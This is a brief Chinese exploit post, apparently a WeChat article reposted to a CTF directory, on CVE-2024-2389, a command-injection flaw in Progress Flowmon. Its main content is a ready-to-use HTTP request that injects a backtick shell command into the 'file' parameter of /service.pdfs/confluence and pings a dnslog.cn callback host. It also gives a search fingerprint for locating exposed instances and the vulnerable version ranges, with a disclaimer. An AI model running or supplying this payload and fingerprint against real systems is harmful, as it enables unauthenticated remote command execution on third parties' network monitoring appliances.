Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


漏洞名称

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


漏洞复现

1、替换需要执行的命令,发送请求

GET /service.pdfs/confluence?lang=en&file=`ping dnslog.cn` HTTP/1.1Host: 1.1.1.1

搜索指纹

title=”Flowmon Web Interface”



利用条件

11.x < Progress Flowmon < 11.1.14

12.x < Progress Flowmon < 12.3.5

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):Progress Flowmon 任意命令执行漏洞 CVE-2024-2389

版权声明:admin 发表于 2024年4月27日 上午8:01。
转载请注明:Progress Flowmon 任意命令执行漏洞 CVE-2024-2389 | CTF导航

相关文章